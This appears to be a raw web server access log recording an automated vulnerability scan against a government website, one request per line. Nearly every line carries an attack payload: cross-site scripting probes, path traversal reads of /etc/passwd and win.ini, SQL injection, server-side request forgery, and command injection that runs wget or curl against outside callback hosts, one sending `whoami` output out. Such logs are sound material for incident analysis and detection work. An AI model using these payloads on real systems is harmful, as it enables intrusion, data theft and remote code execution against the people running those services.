2023-10-13 14:31:21 103.153.214.94 GET /index.php SQ=0&t=search&srch=2WfF0d0j859P3EcTZP8RLmYVJXQ&btn_submit=Search&field=all&forum_limiter&attach=0&search_logic=AND&sort_order=REL&author=x"+onmouseover%3Dalert%28document.domain%29+x%3D 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 200 0 0 219
2023-10-13 14:31:23 103.153.214.94 GET /forum/index.php SQ=0&t=search&srch=2WfF0d0j859P3EcTZP8RLmYVJXQ&btn_submit=Search&field=all&forum_limiter&attach=0&search_logic=AND&sort_order=REL&author=x"+onmouseover%3Dalert%28document.domain%29+x%3D%22 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 200 0 0 218
2023-10-13 14:34:13 103.153.214.94 GET /premise/front/getPingData url=http://0.0.0.0:9600/sm/api/v1/firewall/zone/services?zone=;/usr/bin/id; 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 207
2023-10-13 14:35:26 103.153.214.94 GET /prweb/PRAuth/app/default/ - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 200 0 0 218
2023-10-13 14:37:13 103.153.214.94 GET /api/v1/core/proxy/jsonprequest objresponse=false&websiteproxy=true&escapestring=false&url=http://oast.live 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 404 0 2 232
2023-10-13 14:39:20 103.153.214.94 GET /docpicker/internal_proxy/http/oast.me - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 200 0 0 239
2023-10-13 14:39:21 103.153.214.94 GET /wps/PA_WCM_Authoring_UI/proxy/http/oast.me - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 200 0 0 205
2023-10-13 14:39:39 103.153.214.94 GET /assets/app/something/services/AppModule.class/ - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 200 0 0 241
2023-10-13 14:40:51 103.153.214.94 GET /solr/admin/cores wt=json 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 200 0 0 218
2023-10-13 14:40:55 103.153.214.94 GET /passwordreset bundle=';alert(document.domain);var+ok=' 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 213
2023-10-13 14:41:55 103.153.214.94 POST /lumis/portal/controller/xml/PageControllerXml.jsp - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 405 0 1 206
2023-10-13 14:43:56 103.153.214.94 GET /lua/find_prefs.lua.css - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 200 0 0 229
2023-10-13 14:43:59 103.153.214.94 GET /lua/find_prefs.lua.css - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 252
2023-10-13 14:44:12 103.153.214.94 GET /log_download.cgi type=../../etc/passwd 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 200 0 0 637
2023-10-13 14:44:14 103.153.214.94 GET /log_download.cgi type=../../etc/passwd 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 200 0 0 204
2023-10-13 14:44:38 103.153.214.94 GET /backup2.cgi - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 200 0 0 205
2023-10-13 14:44:40 103.153.214.94 GET /backup2.cgi - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 200 0 0 209
2023-10-13 14:45:33 103.153.214.94 POST /tools.cgi - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 https://bcvt.kontum.gov.vn/tools.cgi 405 0 1 252
2023-10-13 14:45:34 103.153.214.94 POST /tools.cgi - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 https://bcvt.kontum.gov.vn/tools.cgi 405 0 1 210
2023-10-13 14:46:47 103.153.214.94 GET /WEB-INF/web.xml - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 211
2023-10-13 14:47:01 103.153.214.94 GET /index.php/component/chronoforums2/profiles/avatar/u1 tvout=file&av=../../../../../../../etc/passwd 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 229
2023-10-13 14:47:40 103.153.214.94 GET /agc/vicidial_mysqli_errors.txt - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 200 0 0 246
2023-10-13 14:47:43 103.153.214.94 GET /static /%2557EB-INF/web.xml 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 200 0 0 209
2023-10-13 14:47:45 103.153.214.94 GET /concat /%2557EB-INF/web.xml 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 204
2023-10-13 14:47:59 103.153.214.94 GET / - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 200 0 0 209
2023-10-13 14:49:32 103.153.214.94 PATCH /redfish/v1/SessionService/ResetPassword/1/ - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 405 0 1 231
2023-10-13 14:49:34 103.153.214.94 POST /redfish/v1/SessionService/Sessions/ - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 405 0 1 204
2023-10-13 14:49:53 103.153.214.94 GET / url=http://0177.0.0.1/server-status 443 - 193.123.37.162 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 200 0 0 240
2023-10-13 14:49:55 103.153.214.94 GET / host=http://0177.0.0.1/server-status 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 205
2023-10-13 14:49:55 103.153.214.94 GET /openam/ui/PWResetUserValidation - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 205
2023-10-13 14:49:57 103.153.214.94 GET /OpenAM-11.0.0/ui/PWResetUserValidation - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 200 0 0 208
2023-10-13 14:49:57 103.153.214.94 GET / file=http://0177.0.0.1/etc/passwd 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 205
2023-10-13 14:50:00 103.153.214.94 GET /ui/PWResetUserValidation - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 200 0 0 235
2023-10-13 14:55:53 103.153.214.94 POST /nacos/v1/cs/configs dataId=nacos.cfg.dataIdfoo&group=foo&content=helloWorld 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 405 0 1 247
2023-10-13 14:55:56 103.153.214.94 POST /nacos/v1/cs/configs dataId=nacos.cfg.dataIdfoo&group=foo&content=helloWorld 443 - 193.123.37.162 Nacos-Server - 405 0 1 231
2023-10-13 14:56:34 103.153.214.94 GET /nacos/v1/cs/ops/derby sql=select+st.tablename+from+sys.systables+st 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 200 0 0 207
2023-10-13 14:57:31 103.153.214.94 GET /ghost/preview - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 200 0 0 219
2023-10-13 15:02:15 103.153.214.94 GET /Images/Remote imageUrl=https://oast.me/ 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 211
2023-10-13 15:02:18 103.153.214.94 GET /Items/RemoteSearch/Image ImageUrl=https://oast.me/&ProviderName=TheMovieDB 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 247
2023-10-13 15:03:08 103.153.214.94 POST / - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 405 0 1 211
2023-10-13 15:07:04 103.153.214.94 GET /new/newhttp:/interact.sh - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 200 0 0 231
2023-10-13 15:07:54 103.153.214.94 GET /KeepAlive.jsp stamp=16170297%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 225
2023-10-13 15:07:54 103.153.214.94 GET / server=db&username=root&db=mysql&table=event%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 230
2023-10-13 15:07:56 103.153.214.94 POST /seo/seopanel/login.php sec=forgot 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 405 0 1 1173
2023-10-13 15:08:11 103.153.214.94 POST /webtools/control/SOAPService - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 405 0 1 229
2023-10-13 15:10:15 103.153.214.94 GET /vendor/curl/curl/tests/server/php-curl-test/post_file_path_upload.php key=<img%20src%20onerror%3dalert(document.domain)> 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 200 0 0 218
2023-10-13 15:15:55 103.153.214.94 GET /sidekiq/queues/"onmouseover="alert(document.domain)" - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 226
2023-10-13 15:16:50 103.153.214.94 GET /index.asp - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 200 0 0 231
2023-10-13 15:17:15 103.153.214.94 POST /HandleEvent - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 405 0 1 240
2023-10-13 15:21:58 103.153.214.94 GET /knowage/servlet/AdapterHTTP Page=LoginPage&NEW_SESSION=TRUE&TargetService=%2Fknowage%2Fservlet%2FAdapterHTTP%3FPage%3DLoginPage%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 235
2023-10-13 15:23:21 103.153.214.94 POST /index.php - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 405 0 1 250
2023-10-13 15:23:56 103.153.214.94 GET /AvalancheWeb/image imageFilePath=C:/windows/win.ini 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 200 0 0 208
2023-10-13 15:24:11 103.153.214.94 GET /index.php fc=module&module=productcomments&controller=CommentGrade&id_products[]=1%20AND%20(SELECT%203875%20FROM%20(SELECT(SLEEP(6)))xoOt) 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 200 0 0 205
2023-10-13 15:24:15 103.153.214.94 GET /owa/auth/frowny.aspx app=people&et=ServerError&esrc=MasterPage&te=\&refurl=}}};alert(document.domain)// 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 200 0 0 249
2023-10-13 15:26:17 103.153.214.94 GET /if.cgi redirect=setting.htm&failure=fail.htm&type=ap_tcps_apply&TF_ip=443&TF_submask=0&TF_submask=%22%3E%3Cscript%3Ealert%282WfF0swjmXDBUxBEDViBPSUW3NO%29%3C%2Fscript%3E&radio_ping_block=0&max_tcp=3&B_apply=APPLY 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 236
2023-10-13 15:26:55 103.153.214.94 GET /rewe/prod/web/rewe_go_check.php config=rewe&version=7.5.0%3cscript%3econfirm(2WfF0gfxA40xCgemZNSJf2Mk4RQ)%3c%2fscript%3e&win=2707 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 235
2023-10-13 15:26:59 103.153.214.94 GET /appliance/login.ns login%5Bpassword%5D=test%22%3E%3Csvg/onload=alert(document.domain)%3E&login%5Buse_curr%5D=1&login%5Bsubmit%5D=Change%20Password 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 200 0 0 221
2023-10-13 15:27:57 103.153.214.94 GET /index.jsp operatorlocale=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 200 0 0 209
2023-10-13 15:28:36 103.153.214.94 POST /goform/setmac - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F https://bcvt.kontum.gov.vn/index.htmlr 405 0 1 248
2023-10-13 15:28:36 103.153.214.94 GET /pentaho/api/userrolelist/systemRoles require-cfg.js 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 211
2023-10-13 15:28:38 103.153.214.94 GET /api/userrolelist/systemRoles require-cfg.js 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 0 2 224
2023-10-13 15:29:12 103.153.214.94 POST / - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 405 0 1 242
2023-10-13 15:30:17 103.153.214.94 POST /_ignition/execute-solution - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 405 0 1 206
2023-10-13 15:30:18 103.153.214.94 POST /_ignition/execute-solution - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 405 0 1 206
2023-10-13 15:30:20 103.153.214.94 POST /_ignition/execute-solution - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 405 0 1 205
2023-10-13 15:30:23 103.153.214.94 POST /_ignition/execute-solution - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 405 0 1 247
2023-10-13 15:30:24 103.153.214.94 POST /_ignition/execute-solution - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 405 0 1 202
2023-10-13 15:30:26 103.153.214.94 POST /_ignition/execute-solution - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 405 0 1 237
2023-10-13 15:34:27 103.153.214.94 GET /api/experimental/patternfile order=id%3Bselect(md5(999999999))&page=0&page_size=0 443 - 193.123.37.162 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 404 0 2 224
2023-10-13 15:34:52 103.153.214.94 GET /KeepAlive.jsp stamp=%3Cscript%3Ealert(document.domain)%3C/script%3E 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 207
2023-10-13 15:35:50 103.153.214.94 GET /appGet.cgi hook=get_cfg_clientlist() 443 - 193.123.37.162 asusrouter-- https://bcvt.kontum.gov.vn 200 0 0 211
2023-10-13 15:36:37 103.153.214.94 GET /admin/index.php p=ajax-ops&op=elfinder&cmd=mkfile&name=2WfF0kGJCdBRrS4EN5FwhQcJc77.php&target=l1_Lw 443 - 193.123.37.162 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 301 0 0 256
2023-10-13 15:40:02 103.153.214.94 GET /search.php search=%22;wget+http%3A%2F%2Fckjv7uic8b6p3donsoogrp476qm49sku8.oast.online%27;%22 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 200 0 0 206
2023-10-13 15:40:43 103.153.214.94 GET /login next=\\\interact.sh 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 200 0 0 206
2023-10-13 15:43:38 103.153.214.94 GET / rest_route=/wc/store/products/collection-data&calculate_attribute_counts[0][query_type]=or&calculate_attribute_counts[0][taxonomy]=%252522%252529%252520union%252520all%252520select%2525201%25252Cconcat%252528id%25252C0x3a%25252c%252522sqli-test%252522%252529from%252520wp_users%252520where%252520%252549%252544%252520%252549%25254E%252520%2525281%252529%25253B%252500 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 200 0 0 215
2023-10-13 15:43:53 103.153.214.94 GET / Express=aaaa&autoEscape&defaultFilter=e%27);var+require=global.require+%7C%7C+global.process.mainModule.constructor._load;+require(%27child_process%27).exec(%27wget%20http://ckjv7uic8b6p3donsoogb9qnthwowftnr.oast.online%27);// 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 212
2023-10-13 15:46:00 103.153.214.94 GET / layout=/etc/passwd 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 241
2023-10-13 15:46:10 103.153.214.94 GET /widgets/knowledgebase topicId=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 248
2023-10-13 15:46:16 103.153.214.94 GET /t/index.php action[]=aaaa 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 200 0 0 204
2023-10-13 15:46:22 103.153.214.94 GET /status.htm - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 200 0 0 210
2023-10-13 15:46:54 103.153.214.94 POST /RPC2_Login - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 https://bcvt.kontum.gov.vn 405 0 1 217
2023-10-13 15:47:53 103.153.214.94 GET /ajax/networking/get_netcfg.php iface=;curl%20ckjv7uic8b6p3donsoog4hpu616k7e9is.oast.online/`whoami`; 443 - 193.123.37.162 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 200 0 0 216
2023-10-13 15:48:49 103.153.214.94 GET /admin/elfinder/elfinder-cke.html - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 301 0 0 238
2023-10-13 15:48:50 103.153.214.94 GET /assets/backend/elfinder/elfinder-cke.html - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 206
2023-10-13 15:48:53 103.153.214.94 GET /assets/elFinder-2.1.9/elfinder.html - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 200 0 0 240
2023-10-13 15:48:55 103.153.214.94 GET /assets/elFinder/elfinder.html - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 231
2023-10-13 15:48:57 103.153.214.94 GET /backend/elfinder/elfinder-cke.html - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 209
2023-10-13 15:49:00 103.153.214.94 GET /elfinder/elfinder-cke.html - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 200 0 0 239
2023-10-13 15:49:02 103.153.214.94 GET /uploads/assets/backend/elfinder/elfinder-cke.html - 443 - 193.123.37.162 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 200 0 0 247
2023-10-13 15:49:04 103.153.214.94 GET /uploads/assets/backend/elfinder/elfinder.html - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 200 0 0 238
2023-10-13 15:49:06 103.153.214.94 GET /uploads/elfinder/elfinder-cke.html - 443 - 193.123.37.162 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 200 0 0 238
2023-10-13 15:49:31 103.153.214.94 GET /uapi-cgi/certmngr.cgi action=createselfcert&local=anything&country=AA&state=%24(wget%20http://ckjv7uic8b6p3donsoog9qjkzm8f91nwn.oast.online)&organization=anything&organizationunit=anything&commonname=anything&days=1&type=anything 443 - 193.123.37.162 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 200 0 0 213
2023-10-13 15:50:58 103.153.214.94 GET /system/images/W1siZyIsICJjb252ZXJ0IiwgIi1zaXplIDF4MSAtZGVwdGggOCBncmF5Oi9ldGMvcGFzc3dkIiwgIm91dCJdXQ== - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 200 0 0 208
2023-10-13 15:51:01 103.153.214.94 GET /system/refinery/images/W1siZyIsICJjb252ZXJ0IiwgIi1zaXplIDF4MSAtZGVwdGggOCBncmF5Oi9ldGMvcGFzc3dkIiwgIm91dCJdXQ== - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 200 0 0 246
